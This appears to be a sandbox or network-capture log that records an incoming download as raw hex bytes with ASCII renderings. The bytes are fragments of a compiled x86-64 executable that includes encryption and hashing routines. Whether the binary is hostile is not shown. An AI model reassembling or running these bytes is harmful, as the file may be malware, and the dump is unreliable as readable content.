2022-01-30 12:43:46 UTC	947	IN	Data Raw: 00 00 00 48 8d 15 14 22 0a 00 4c 89 f9 e8 05 19 06 00 48 89 e9 ba 01 00 00 00 e8 5b 54 fe ff 48 8d 15 13 0d 0a 00 4c 89 f9 41 89 c0 e8 2c 19 06 00 48 89 e9 ba 04 00 00 00 e8 3c 54 fe ff 8d 48 02 48 63 c9 48 69 c9 56 55 55 55 48 89 ca 48 c1 ea 3f 48 c1 e9 20 01 d1 8d 0c 49 f7 d9 44 8d 04 08 41 83 c0 02 48 8d 15 3a e2 09 00 4c 89 f9 e8 e9 18 06 00 48 89 e9 ba 05 00 00 00 e8 42 53 fe ff 44 0f b6 c0 48 8d 15 7f 36 0a 00 4c 89 f9 e8 c9 18 06 00 48 89 e9 ba 06 00 00 00 e8 d9 53 fe ff 4c 63 c0 49 69 c0 89 88 88 88 48 c1 e8 20 41 01 c0 44 89 c0 c1 e8 1f 41 c1 f8 05 41 01 c0 48 8d 15 39 24 0a 00 4c 89 f9 e8 8f 18 06 00 48 89 e9 ba 06 00 00 00 e8 9f 53 fe ff 4c 63 c0 49 69 c0 89 88 88 88 48 c1 e8 20 44 01 c0 89 c1 c1 e9 1f c1 f8 05 01 c8 6b c0 3c 41 29 c0 48 8d 15 Data Ascii: H"LH[THLA,H<THHcHiVUUUHH?H IDAH:LHBSDH6LHSLcIiH ADAAH9$LHSLcIiH Dk<A)H
2022-01-30 12:43:46 UTC	954	IN	Data Raw: 00 4c 89 e9 ba 02 00 00 00 e8 77 3c fe ff 44 8b 05 e8 8c 0b 00 c7 44 24 20 01 00 00 00 48 8d 15 d5 ed 09 00 48 89 f1 4d 89 e9 e8 ec 1c 00 00 48 89 f9 e8 0c 24 ff ff c7 44 24 20 03 00 00 00 48 8d 15 71 b3 09 00 48 89 f1 45 31 c0 4d 89 e9 e8 c7 1c 00 00 48 8d 3d 0b c3 09 00 48 89 f9 ba 01 00 00 00 e8 62 b0 04 00 48 89 f1 48 89 fa 41 89 c0 e8 e6 fb 05 00 8d 48 01 48 63 c9 48 69 c9 56 55 55 55 48 89 ca 48 c1 ea 3f 48 c1 e9 20 01 d1 8d 0c 49 f7 d9 44 8d 04 08 41 ff c0 4c 89 e9 ba 04 00 00 00 e8 dc 3b fe ff c7 44 24 20 05 00 00 00 48 8d 15 13 17 0a 00 48 89 f1 41 b0 01 4d 89 e9 e8 98 1c 00 00 48 8d 3d f2 04 0a 00 48 89 f9 31 d2 e8 f3 af 04 00 48 89 f1 48 89 fa 41 89 c0 e8 77 fb 05 00 89 c7 48 8d 1d 20 d9 09 00 48 89 d9 31 d2 e8 d2 af 04 00 48 89 f1 48 89 da 41 Data Ascii: Lw<DD$ HHMH$D$ HqHE1MH=HbHHAHHcHiVUUUHH?H IDAL;D$ HHAMH=H1HHAwH H1HHA
2022-01-30 12:43:46 UTC	962	IN	Data Raw: 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 58 4d 89 cd 44 89 c6 48 89 54 24 38 8b ac 24 c0 00 00 00 e8 14 28 04 00 89 f1 48 89 4c 24 50 48 8d 0c cd 00 00 00 00 4c 8d 34 49 31 c9 48 89 4c 24 30 49 89 c4 c7 44 24 2c 00 00 00 00 4c 89 e7 49 ff c4 8a 0f 80 f9 2c 75 08 48 ff c7 49 ff c4 eb f1 84 c9 0f 84 a1 00 00 00 84 c9 74 0e 80 f9 2c 74 0e 41 8a 0c 24 49 ff c4 eb ee 49 ff cc eb 06 41 c6 44 24 ff 00 85 f6 7e c2 48 89 44 24 40 31 db 48 8b 44 24 38 48 8b 0c 18 48 89 fa e8 04 1a 07 00 85 c0 74 10 48 83 c3 18 49 39 de 75 e2 48 8b 44 24 40 eb 96 48 8b 44 24 38 44 8b 4c 18 08 41 83 f9 ff 48 8b 44 24 40 74 81 ba 01 00 00 00 44 89 c9 d3 e2 8b 4c 24 2c 44 0f a3 c9 0f 82 69 ff ff ff 09 54 24 2c 4c 89 e9 89 ea 48 8b 7c 24 30 41 89 f8 Data Ascii: _^A\A]A^A_AWAVAUATVWUSHXMDHT$8$(HL$PHL4I1HL$0ID$,LI,uHIt,tA$IIAD$~HD$@1HD$8HHtHI9uHD$@HD$8DLAHD$@tDL$,DiT$,LH\|$0A
2022-01-30 12:43:46 UTC	970	IN	Data Raw: 60 4c 89 e9 4d 89 f5 e8 b7 e5 fe ff 49 89 fe 4c 89 f9 e8 12 cf 02 00 48 89 c5 4c 89 f9 e8 99 b8 fe ff 4c 8b 8e 80 00 00 00 44 8b 46 78 48 8b 4e f8 48 8b 56 70 48 89 7c 24 40 48 8b bc 24 80 00 00 00 48 89 7c 24 38 4c 89 64 24 30 48 89 6c 24 28 48 89 44 24 20 48 c7 44 24 48 00 00 00 00 e8 f1 c0 00 00 48 89 86 70 01 00 00 48 8b 8e 68 01 00 00 48 89 48 08 4c 89 68 40 48 8b 4e f0 48 89 48 50 48 89 58 58 48 8b 4e 28 48 89 48 48 8b 4e 08 89 48 60 4d 85 f6 74 0f 48 8b 96 70 01 00 00 4c 89 f1 e8 cd f5 00 00 48 8d 86 70 01 00 00 48 8b 8e 70 01 00 00 48 89 41 38 48 8b 96 68 01 00 00 48 8b 8e 70 01 00 00 4c 8d 42 58 48 83 c2 20 e8 68 c2 01 00 48 8b 4e f0 48 8b 01 ff 50 28 48 8d 56 18 48 8b 4e f8 e8 85 55 ff ff 48 89 86 98 01 00 00 b9 a8 00 00 00 48 03 8e 68 01 00 00 Data Ascii: `LMILHLLDFxHNHVpH\|$@H$H\|$8Ld$0Hl$(HD$ HD$HHpHhHHLh@HNHHPHXXHN(HHHNH`MtHpLHpHpHA8HhHpLBXH hHNHP(HVHNUHHh
2022-01-30 12:43:46 UTC	978	IN	Data Raw: 00 0f 84 8b 02 00 00 31 ed b9 01 00 00 00 ba 38 00 00 00 45 31 c0 e8 ee c5 fe ff 48 89 c3 48 89 30 48 89 c1 e8 fd f1 ff ff 89 7b 08 48 8d 53 28 48 8b 4e 70 40 88 6c 24 20 45 31 c0 41 b9 ff ff ff ff e8 84 d4 05 00 48 89 43 20 89 7b 08 40 88 6b 14 48 8b 86 d8 00 00 00 48 8b 00 b9 15 00 00 00 ff 50 18 48 89 c7 8b 53 08 48 8d 68 60 48 89 e9 e8 07 c0 fe ff 8b 53 0c 48 89 e9 e8 fc bf fe ff 48 8d 57 40 48 8b 8e e8 00 00 00 e8 00 96 01 00 48 8d 0d e6 a6 09 00 e9 2c 02 00 00 48 83 c3 28 48 89 d9 e8 88 c2 fe ff 41 89 c6 48 8d 7c 24 40 48 89 f9 48 89 da e8 a9 c2 fe ff 0f 10 07 0f 29 44 24 30 48 89 d9 e8 65 c2 fe ff 89 c5 0f 28 44 24 30 0f 29 07 48 8d 7c 24 40 48 89 f9 e8 12 f4 03 00 48 89 47 10 89 6f 04 48 8b 4e 78 48 8d 54 24 40 45 31 c0 e8 6f dd 03 00 48 85 c0 0f Data Ascii: 18E1HH0H{HS(HNp@l$ E1AHC {@kHHPHSHh`HSHHW@HH,H(HAH\|$@HH)D$0He(D$0)H\|$@HHGoHNxHT$@E1oH
2022-01-30 12:43:46 UTC	986	IN	Data Raw: 49 8b 87 38 02 00 00 48 8b 00 b9 20 00 00 00 ff 50 18 48 89 c5 48 8d 48 60 48 89 da e8 41 a2 fe ff 48 83 c5 40 49 8b 8f 48 02 00 00 48 89 ea e8 1d 77 01 00 48 ff c7 ff ce 0f 85 79 ff ff ff 48 8d 0d ac 50 09 00 e8 d9 c9 03 00 49 8b 4c 24 48 48 89 c2 e8 6e 8b fe ff eb 5d 48 8d 0d 23 ac 09 00 e8 be c9 03 00 49 8b 4c 24 48 48 89 c2 e8 53 8b fe ff 41 8b 8c 24 90 fe ff ff 49 8b 44 24 08 48 8b 00 ff 50 18 48 89 c7 49 8b 84 24 80 fe ff ff 48 8b 40 38 48 8b 08 e8 d1 d0 fe ff 48 8d 4f 60 48 89 c2 e8 91 a1 fe ff 48 8d 57 40 49 8b 4c 24 18 e8 9a 76 01 00 41 c6 84 24 f5 fd ff ff 00 48 8d 0d af ab 09 00 e8 58 c9 03 00 49 8b 4c 24 48 48 89 c2 e8 ed 8a fe ff 49 8b 8c 24 80 fe ff ff e8 9c d0 fe ff 49 c7 84 24 80 fe ff ff 00 00 00 00 41 c7 84 24 d0 fd ff ff 5c 04 00 00 4c Data Ascii: I8H PHHH`HAH@IHHwHyHPIL$HHn]H#IL$HHSA$ID$HPHI$H@8HHO`HHW@IL$vA$HXIL$HHI$I$A$\L
2022-01-30 12:43:46 UTC	993	IN	Data Raw: 38 48 63 53 10 48 03 53 20 48 8b 43 68 48 8b 48 08 e8 e3 80 fe ff 8b 43 10 03 43 38 89 43 10 48 63 d0 48 03 53 20 48 8b 4b 68 e8 c6 c8 01 00 84 c0 0f 84 66 03 00 00 48 8b 43 20 8b 08 0f c9 89 4b 04 8b 43 10 8d 50 fc 39 d1 0f 85 50 03 00 00 48 98 4c 63 43 14 49 01 c0 44 89 43 1c b9 01 00 00 00 ba 50 00 00 00 e8 1d 87 fe ff 48 89 43 40 31 c9 48 89 48 08 48 8b 43 40 48 89 48 10 48 8b 43 40 c7 00 00 00 00 00 48 8b 43 40 c6 40 20 00 48 8b 53 20 48 8b 4b 40 48 83 c1 50 48 89 4b 30 4c 63 43 1c e8 e8 b4 05 00 48 8b 43 30 0f b6 48 04 89 4b 08 83 f9 04 0f 82 5a 03 00 00 8b 43 04 29 c8 0f 8e 4f 03 00 00 8d 48 ff 89 4b 0c 83 c0 04 89 43 18 48 8b 43 48 80 38 00 74 12 8b 48 04 2b 4b 10 76 05 89 48 04 eb 05 66 c7 00 00 01 8b 43 58 8d 48 01 89 4b 58 48 8b 4b 40 89 41 04 Data Ascii: 8HcSHS HChHHCC8CHcHS HKhfHC KCP9PHLcCIDCPHC@1HHHC@HHHC@HC@@ HS HK@HPHK0LcCHC0HKZC)OHKCHCH8tH+KvHfCXHKXHK@A
2022-01-30 12:43:46 UTC	1001	IN	Data Raw: 8b 8e d8 00 00 00 e8 c6 38 01 00 e9 db 03 00 00 41 f6 47 18 01 0f 85 ee 06 00 00 48 89 e9 e8 4e 65 fe ff 41 01 47 70 41 f6 47 18 01 0f 85 d7 06 00 00 4c 89 f9 e8 2f 10 00 00 85 c0 0f 85 c7 06 00 00 41 c6 47 1e 00 4c 89 f9 e8 72 0e 00 00 e9 b5 06 00 00 48 89 e9 e8 15 65 fe ff 89 c7 48 8d 8c 24 e0 05 00 00 48 89 ea e8 37 65 fe ff 41 83 7c 24 40 00 0f 85 8f 06 00 00 4c 8b 84 24 e0 05 00 00 4c 8b 8c 24 e8 05 00 00 45 29 4f 78 45 29 8f 80 00 00 00 83 ff 02 b8 00 00 00 00 4c 0f 43 c8 83 ff 01 0f 94 c2 49 8b 8f a8 00 00 00 48 8b 01 ff 50 18 49 83 bf a0 00 00 00 00 0f 85 47 06 00 00 48 89 c3 41 83 bf 80 00 00 00 00 7f 1e 41 83 bf 98 00 00 00 02 75 14 41 8b 47 7c 3d ff ff ff 3f 7f 09 05 00 40 00 00 41 89 47 7c 41 8b 47 7c 89 c2 29 da 7e 0c 4c 89 f9 e8 aa 0c 00 00 Data Ascii: 8AGHNeAGpAGL/AGLrHeH$H7eA\|$@L$L$E)OxE)LCIHPIGHAAuAG\|=?@AG\|AG\|)~L
2022-01-30 12:43:46 UTC	1009	IN	Data Raw: e8 78 43 fe ff 49 8d 56 40 48 8b 4f 28 e8 7f 19 01 00 48 8b 4f b8 48 85 c9 75 1d 48 8d 0d a9 d7 09 00 48 8d 15 1e e3 09 00 41 b8 28 01 00 00 e8 e5 24 06 00 48 8b 4f b8 48 89 f2 e8 c6 68 03 00 48 39 f0 74 19 48 8d 0d cb dd 09 00 48 8d 15 f4 e2 09 00 41 b8 2a 01 00 00 e8 bb 24 06 00 48 89 f1 48 83 c4 28 5b 5f 5e 41 5e e9 2d 31 02 00 41 56 56 57 53 48 83 ec 28 49 89 d6 48 89 ce 48 8d 99 50 ff ff ff b9 01 00 00 00 ba c0 00 00 00 45 31 c0 e8 72 48 fe ff 48 89 c7 48 89 18 48 89 c1 e8 87 d5 ff ff c6 47 14 01 4c 89 b7 a8 00 00 00 48 8d 0d 96 29 09 00 e8 a8 6b 03 00 48 8b 4e 58 48 89 c2 e8 3e 2d fe ff 48 8d 15 2b 1f 09 00 48 89 f9 e8 ef d5 ff ff 48 8d 50 40 48 8b 4e 28 e8 ad 18 01 00 48 81 c7 b0 00 00 00 48 89 f8 48 83 c4 28 5b 5f 5e 41 5e c3 48 83 ec 28 48 8d 0d Data Ascii: xCIV@HO(HOHuHHA($HOHhH9tHHA*$HH([_^A^-1AVVWSH(IHHPE1rHHHHGLH)kHNXH>-H+HHP@HN(HHH([_^A^H(H
2022-01-30 12:43:46 UTC	1017	IN	Data Raw: 8d 1d 2a 0c 00 00 48 89 5c 24 38 48 89 7c 24 30 48 89 74 24 28 48 89 44 24 20 ff 55 40 41 89 85 70 03 00 00 48 89 f1 e8 17 2a fe ff 48 89 f9 e8 2c a7 01 00 41 c7 45 04 68 03 00 00 e9 95 e7 ff ff 49 8b 8d d8 01 00 00 e8 72 05 00 00 84 c0 0f 85 ae e7 ff ff 49 83 bd c8 00 00 00 00 0f 84 ef 00 00 00 41 c6 85 6b 03 00 00 01 e9 93 e7 ff ff 49 8b 8d d8 01 00 00 49 8b 95 d0 02 00 00 e8 ac 04 00 00 84 c0 74 5c 48 89 f9 e8 b4 29 fe ff e9 6f e7 ff ff 48 85 c0 75 20 48 8d 0d 4b b8 09 00 48 8d 15 38 c3 09 00 41 b8 8f 03 00 00 e8 27 05 06 00 49 8b 85 c8 02 00 00 49 8b 8d d0 00 00 00 48 89 c2 e8 29 3f 06 00 85 c0 0f 84 33 e7 ff ff 49 8b 8d 68 10 00 00 48 8d 15 8f 28 09 00 e9 2f fa ff ff 48 8d 0d 35 62 09 00 e8 35 4c 03 00 49 8b 8d 58 10 00 00 48 89 c2 e8 c8 0d fe ff 48 Data Ascii: H\$8H\|$0Ht$(HD$ U@ApHH,AEhIrIAkIIt\H)oHu HKH8A'IIH)?3IhH(/H5b5LIXHH
2022-01-30 12:43:46 UTC	1025	IN	Data Raw: 01 00 00 48 89 f9 e8 b6 38 03 00 84 c0 75 12 49 83 c5 18 49 81 fd 80 01 00 00 75 ce e9 73 03 00 00 48 8b 54 24 70 49 29 d5 0f b6 44 24 64 f6 c3 01 bd 00 00 00 00 0f 45 e8 48 8b 8c 24 90 00 00 00 4c 89 ac cc 90 01 00 00 49 89 cd f6 84 24 98 00 00 00 01 0f 45 e8 48 83 f9 01 0f 47 e8 49 ff c5 48 81 c2 80 fe ff ff 49 81 c4 80 01 00 00 49 83 fd 08 4c 8b 74 24 58 0f 85 01 fe ff ff 48 8b 94 24 20 03 00 00 48 8d 8c 24 40 01 00 00 e8 52 07 fe ff 48 8b 94 24 20 03 00 00 48 8d 8c 24 40 01 00 00 e8 3d 07 fe ff 48 8b 94 24 f0 02 00 00 48 8d 8c 24 40 01 00 00 e8 28 07 fe ff 48 8b 94 24 f0 02 00 00 48 8d 8c 24 40 01 00 00 e8 13 07 fe ff 48 8b 8c 24 f0 02 00 00 e8 6c 06 fe ff 40 f6 c5 01 0f 94 c1 20 c1 41 88 8e 75 03 00 00 31 c0 4c 8d 05 a9 0e 00 00 31 f6 48 8b bc 24 80 Data Ascii: H8uIIusHT$pI)D$dEH$LI$EHGIHIILt$XH$ H$@RH$ H$@=H$H$@(H$H$@H$l@ Au1L1H$
2022-01-30 12:43:46 UTC	1033	IN	Data Raw: e8 ab 12 03 00 48 8b 8e 58 ff ff ff 48 89 44 29 08 48 8b 96 48 ff ff ff 4c 89 e9 e8 85 e8 fd ff 48 8b 86 58 ff ff ff 48 8b 4c 28 08 48 83 c1 18 4c 89 ea e8 87 e4 fd ff 4c 8b be 58 ff ff ff 49 8b 04 2f 48 8b 48 08 48 8b 40 10 48 89 8c 24 50 01 00 00 48 89 84 24 60 01 00 00 48 c7 84 24 58 01 00 00 00 00 00 00 c7 84 24 68 01 00 00 00 00 00 00 48 89 9c 24 70 01 00 00 4c 89 e1 48 89 da e8 20 e8 fd ff 0f 10 84 24 20 01 00 00 41 0f 11 44 2f 10 48 83 c5 20 48 39 ef 0f 85 2a ff ff ff 48 8d 0d 04 91 08 00 48 8b 7c 24 40 48 89 fa e8 f0 0d 03 00 48 8b 4e 48 48 89 c2 e8 86 cf fd ff 48 8b 86 f0 fe ff ff 48 85 c0 0f 84 bb 04 00 00 48 85 ff 4c 8b 7c 24 48 74 64 4c 8b 68 08 48 8b 68 10 31 db 4c 8d b4 24 50 01 00 00 4c 8d a4 24 10 01 00 00 31 ff 48 8b 86 58 ff ff ff 48 8b Data Ascii: HXHD)HHLHXHL(HLLXI/HHH@H$PH$`H$X$hH$pLH $ AD/H H9*HH\|$@HHNHHHHHL\|$HtdLhHh1L$PL$1HXH
2022-01-30 12:43:46 UTC	1040	IN	Data Raw: ff ff 03 00 00 00 c7 86 f8 fd ff ff f7 02 00 00 4c 89 f9 e8 a2 0b 00 00 48 8b 4e 10 48 89 ca 41 b0 01 ff 51 30 48 85 c0 0f 84 03 fc ff ff 48 89 c2 83 38 3c 74 35 48 83 c2 08 48 8b 4e 10 e8 09 9d 00 00 48 8b 86 60 ff ff ff 48 ff c0 48 89 86 60 ff ff ff 48 3b 86 68 ff ff ff 0f 82 48 ef ff ff 41 c6 47 65 01 e9 3e ef ff ff 48 8b 86 58 ff ff ff 48 8b 8e 60 ff ff ff 48 c1 e1 05 48 8b 44 08 08 48 8b 78 08 48 8b 58 10 48 8b 4e 50 48 8b 01 ff 90 90 00 00 00 84 c0 74 24 48 89 d9 e8 4b f0 02 00 48 8d 0d e7 49 09 00 89 c2 49 89 f8 e8 b0 ee 02 00 48 89 f1 48 89 c2 e8 a3 a9 00 00 48 8b 46 08 48 8b 00 b9 32 00 00 00 ff 50 18 48 89 46 88 48 8b 96 d0 fe ff ff 48 8d 48 60 e8 98 c6 fd ff 48 8b 86 08 fe ff ff 48 8b 4e 88 48 8b 00 48 8b 50 40 48 83 c1 60 e8 7d c6 fd ff 48 8b Data Ascii: LHNHAQ0HH8<t5HHNH`HH`H;hHAGe>HXH`HHDHxHXHNPHt$HKHIIHHHFH2PHFHHH`HHNHHP@H`}H
2022-01-30 12:43:46 UTC	1048	IN	Data Raw: ff ff 66 0f 38 de 91 38 ff ff ff 66 0f 38 de 91 48 ff ff ff 66 0f 38 de 91 58 ff ff ff 66 0f 38 de 91 68 ff ff ff 66 0f 38 de 91 78 ff ff ff 66 0f 38 de 51 88 66 0f 38 de 51 98 66 0f 38 de 51 a8 66 0f 38 df 51 b8 66 0f ef d0 f3 0f 7f 12 66 0f 7f 49 e8 48 83 c2 10 66 0f 6f c1 48 39 c2 0f 82 72 ff ff ff c3 45 85 c0 0f 8e d6 00 00 00 49 63 c0 48 01 d0 66 0f 6f 59 e8 66 0f 6f 05 1f 50 07 00 66 0f 6f 0d 27 50 07 00 66 0f ef d2 66 0f 38 00 d8 66 0f ef 99 08 fe ff ff 66 0f 38 dc 99 18 fe ff ff 66 0f 38 dc 99 28 fe ff ff 66 0f 38 dc 99 38 fe ff ff 66 0f 38 dc 99 48 fe ff ff 66 0f 38 dc 99 58 fe ff ff 66 0f 38 dc 99 68 fe ff ff 66 0f 38 dc 99 78 fe ff ff 66 0f 38 dc 99 88 fe ff ff 66 0f 38 dc 99 98 fe ff ff 66 0f 38 dc 99 a8 fe ff ff 66 0f 38 dc 99 b8 fe ff ff 66 Data Ascii: f88f8Hf8Xf8hf8xf8Qf8Qf8Qf8QffIHfoH9rEIcHfoYfoPfo'Pff8ff8f8(f88f8Hf8Xf8hf8xf8f8f8f8f
2022-01-30 12:43:46 UTC	1056	IN	Data Raw: 48 89 c3 48 c1 eb 02 48 21 eb 48 09 f3 4c 33 64 24 28 48 31 c3 4a 8d 34 cd 00 00 00 00 49 d1 e9 48 bd 88 88 88 88 88 88 88 88 48 21 ee 4c 89 c0 4d 21 c1 49 09 f1 48 8d 34 dd 00 00 00 00 48 21 ee 49 89 e8 48 d1 eb 48 21 c3 48 09 f3 48 31 ca 4c 33 6c 24 60 49 31 dd 4a 8d 0c b5 00 00 00 00 48 bd cc cc cc cc cc cc cc cc 48 21 e9 4d 31 f5 49 c1 ee 02 48 be 33 33 33 33 33 33 33 33 49 21 f6 49 09 ce 48 8d 0c fd 00 00 00 00 4c 21 c1 48 d1 ef 48 21 c7 48 09 cf 4a 8d 0c dd 00 00 00 00 49 d1 eb 4c 21 c1 49 21 c3 49 09 cb 4c 8b 44 24 48 4c 33 44 24 20 4a 8d 34 a5 00 00 00 00 48 21 ee 4c 89 e1 48 c1 e9 02 48 bd 33 33 33 33 33 33 33 33 48 21 e9 48 09 f1 4c 33 44 24 58 4c 33 64 24 38 66 0f ef d4 66 0f 6f e2 66 0f 73 f4 03 66 0f 6f f2 66 0f 73 d6 01 66 41 0f 6f fc 66 0f Data Ascii: HHH!HL3d$(H1J4IHH!LM!IH4H!IHH!HH1L3l$`I1JHH!M1IH33333333I!IHL!HH!HJIL!I!ILD$HL3D$ J4H!LHH33333333H!HL3D$XL3d$8ffofsfofsfAof
2022-01-30 12:43:46 UTC	1064	IN	Data Raw: ff ba 10 01 00 00 48 89 f1 e8 c3 f0 03 00 48 89 f1 48 83 c4 20 5e e9 a8 6e fd ff 56 57 55 53 48 81 ec 28 01 00 00 48 89 d3 48 89 cf 48 8b 05 6e cb 09 00 48 31 e0 48 89 84 24 20 01 00 00 48 8b 01 8b 68 50 81 fd 01 01 00 00 72 19 48 8d 0d 76 1f 09 00 48 8d 15 43 0d 09 00 41 b8 28 00 00 00 e8 f4 49 05 00 48 8d b7 f8 fe ff ff 66 c7 87 f8 fe ff ff 00 00 31 c9 88 8c 0f fa fe ff ff 89 c8 31 d2 f7 f5 8a 04 13 88 44 0c 20 48 ff c1 48 81 f9 00 01 00 00 75 e0 31 c0 31 c9 0f b6 94 07 fa fe ff ff 89 d5 01 cd 0f b6 4c 04 20 01 e9 0f b6 c9 8a 9c 0f fa fe ff ff 88 9c 07 fa fe ff ff 88 94 0f fa fe ff ff 48 ff c0 48 3d 00 01 00 00 75 ca b9 00 06 00 00 ba 01 00 00 00 45 31 c0 e8 66 6d fd ff 48 89 c7 41 b8 00 06 00 00 48 89 c1 31 d2 e8 bb 9f 04 00 48 89 f1 48 89 fa 41 b8 00 Data Ascii: HHH ^nVWUSH(HHHnH1H$ HhPrHvHCA(IHf11D HHu11L HH=uE1fmHAH1HHA
2022-01-30 12:43:46 UTC	1072	IN	Data Raw: c1 c0 28 48 8b 4c 24 38 48 01 f9 48 89 4c 24 38 49 31 cc 49 c1 c4 28 48 8d 0d 43 f5 06 00 44 0f b6 7c 0d f6 4a 03 54 fc 60 4c 01 f6 48 8b 5c 24 30 48 01 c3 4c 01 e2 44 0f b6 7c 0d f7 49 31 f1 4d 01 ea 4e 03 54 fc 60 49 31 d8 48 31 d7 4d 31 d3 49 c1 c1 30 49 c1 c3 20 49 c1 c0 30 44 0f b6 7c 0d f8 48 8b 4c 24 48 4c 01 d9 48 89 4c 24 48 48 c1 c7 30 49 31 cd 49 c1 c5 28 4c 01 4c 24 40 4e 03 54 fc 60 4d 01 ea 4c 01 44 24 28 4d 31 d3 49 c1 c3 30 48 01 7c 24 38 48 89 e9 48 89 6c 24 50 4c 8d 3d b9 f4 06 00 42 0f b6 6c 3d f9 48 03 74 ec 60 4c 33 74 24 40 42 0f b6 6c 39 fb 48 89 d9 48 03 4c ec 60 48 33 44 24 28 4c 33 64 24 38 4d 89 cf 48 8b 5c 24 50 48 8d 2d 82 f4 06 00 44 0f b6 4c 2b fd 49 d1 c6 4a 03 54 cc 60 48 d1 c0 4c 01 5c 24 48 44 0f b6 4c 2b fa 49 d1 c4 48 Data Ascii: (HL$8HHL$8I1I(HCD\|JT`LH\$0HLD\|I1MNT`I1H1M1I0I I0D\|HL$HLHL$HH0I1I(LL$@NT`MLD$(M1I0H\|$8HHl$PL=Bl=Ht`L3t$@Bl9HHL`H3D$(L3d$8MH\$PH-DL+IJT`HL\$HDL+IH
2022-01-30 12:43:46 UTC	1079	IN	Data Raw: 41 38 0f ca 89 51 3c b8 40 00 00 00 89 81 80 00 00 00 44 89 81 bc 00 00 00 89 91 c0 00 00 00 89 81 04 01 00 00 48 c7 81 b4 00 00 00 01 00 00 00 ba 08 00 00 00 4c 89 c9 e8 14 b2 03 00 48 8b 4c 24 30 48 31 e1 e8 27 4c 04 00 90 48 83 c4 38 c3 cc 56 57 48 83 ec 28 48 89 d6 48 89 cf 48 89 d1 e8 3a 00 00 00 48 89 3e 48 8b 47 08 48 89 46 08 48 89 77 08 48 8b 46 08 48 89 30 48 8b 46 10 48 01 47 20 48 8b 4f 28 48 85 c9 74 0b 48 83 c4 28 5f 5e e9 3a 23 fc ff 90 48 83 c4 28 5f 5e c3 56 48 83 ec 20 48 89 ce 80 79 18 00 74 1b 48 8b 06 48 8b 4e 08 48 89 48 08 48 8b 06 48 8b 4e 08 48 89 01 48 83 c4 20 5e c3 48 83 3e 00 74 19 48 8d 0d 4a b7 08 00 48 8d 15 17 cb 08 00 41 b8 1a 00 00 00 e8 f2 0a 05 00 48 83 7e 08 00 74 d4 48 8d 0d 12 b7 08 00 48 8d 15 f7 ca 08 00 41 b8 1b Data Ascii: A8Q<@DHLHL$0H1'LH8VWH(HHH:H>HGHFHwHFH0HFHG HO(HtH(_^:#H(_^VH HytHHNHHHHNHH ^H>tHJHAH~tHHA
2022-01-30 12:43:46 UTC	1087	IN	Data Raw: 89 cb c1 e3 04 31 c3 31 e9 48 89 c8 48 c1 e0 20 89 dd 66 c1 c5 08 48 09 d8 66 89 6f fb 48 89 da 48 c1 ea 10 88 57 fa 48 c1 eb 18 88 5f f9 88 0f 88 6f ff 48 89 ca 48 c1 ea 10 88 57 fe 48 c1 e9 18 88 4f fd 48 8b 4c 24 28 48 89 41 f8 41 83 c6 f8 48 83 c7 08 41 83 fe 08 0f 8f 4a fe ff ff 48 83 c4 48 5b 5d 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 48 48 89 4c 24 28 45 85 c0 0f 8e 15 02 00 00 44 89 c6 48 89 d7 48 8b 4c 24 28 48 8d 81 78 fe ff ff 48 89 44 24 40 48 8d 81 78 ff ff ff 48 89 44 24 38 48 8d 81 f8 fe ff ff 48 89 44 24 30 83 c6 08 48 83 c7 07 41 bd 33 33 33 33 41 bc ff 00 ff 00 41 be 55 55 55 55 44 0f b6 3f 0f b6 47 ff 0f b6 4f fe 0f b6 57 fd 48 c1 e2 38 48 c1 e1 30 48 c1 e0 28 49 c1 e7 20 8b 6f f9 48 c1 e5 20 48 0f Data Ascii: 11HH fHfoHHWH_oHHWHOHL$(HAAHAJHH[]_^A\A]A^A_AWAVAUATVWUSHHHL$(EDHHL$(HxHD$@HxHD$8HHD$0HA3333AAUUUUD?GOWH8H0H(I oH H
2022-01-30 12:43:46 UTC	1095	IN	Data Raw: c6 48 8d 58 18 4c 89 78 18 4c 89 30 4c 89 60 10 48 8b 7f 20 48 8b 57 20 48 8d 4c 24 30 e8 83 ee fc ff 48 8b 47 20 83 78 18 00 74 0a 48 c7 46 08 00 00 00 00 eb 1e 0f 10 44 24 30 48 8d 4c 24 20 0f 29 01 4c 89 f2 e8 51 14 00 00 48 89 46 08 48 85 c0 75 0a 48 89 d9 e8 49 02 00 00 31 db 48 8b 4c 24 70 48 31 e1 e8 86 0d 04 00 48 89 d8 48 83 c4 78 5b 5f 5e 41 5c 41 5e 41 5f c3 56 57 53 48 83 ec 60 4c 89 c3 48 8b 05 14 4e 09 00 48 31 e0 48 89 44 24 58 0f 10 02 48 8d 7c 24 30 0f 29 07 48 89 fa e8 c9 fe ff ff 48 89 c6 48 85 c0 74 43 48 8b 03 48 8b 4b 08 48 89 44 24 30 48 89 4c 24 40 48 c7 44 24 38 00 00 00 00 c7 44 24 48 00 00 00 00 48 89 7c 24 50 48 8d 5c 24 20 48 89 d9 48 89 fa e8 be ed fc ff 48 89 d9 e8 69 22 fd ff 48 89 46 f8 48 8b 4c 24 58 48 31 e1 e8 f1 0c 04 Data Ascii: HXLxL0L`H HW HL$0HG xtHFD$0HL$ )LQHFHuHI1HL$pH1HHx[_^A\A^A_VWSH`LHNH1HD$XH\|$0)HHHtCHHKHD$0HL$@HD$8D$HH\|$PH\$ HHHi"HFHL$XH1
2022-01-30 12:43:46 UTC	1103	IN	Data Raw: e8 9f 07 fd ff 48 89 c7 48 8d 0d 0f 1f 08 00 e8 90 07 fd ff 48 89 c3 b9 03 00 00 00 e8 07 02 fd ff 48 89 c6 48 89 5c 24 38 48 89 7c 24 30 4c 89 6c 24 28 48 89 44 24 20 48 8d 0d 0a 3c 09 00 4c 89 f2 4d 89 f8 4d 89 e1 e8 6b 00 00 00 4c 89 f1 e8 37 02 fd ff 4c 89 f9 e8 2f 02 fd ff 4c 89 e1 e8 27 02 fd ff 4c 89 e9 e8 1f 02 fd ff 48 89 f9 e8 17 02 fd ff 48 89 d9 e8 0f 02 fd ff 48 89 f1 e8 07 02 fd ff 48 8d 05 35 16 08 00 48 89 05 be 3b 09 00 48 89 05 bf 3b 09 00 c6 05 f8 3b 09 00 01 48 8d 05 a1 3b 09 00 48 83 c4 40 5b 5f 5e 41 5c 41 5d 41 5e 41 5f c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 28 4d 89 cf 4c 89 c7 48 89 d3 48 89 ce 4c 8b b4 24 a8 00 00 00 4c 8b a4 24 98 00 00 00 4c 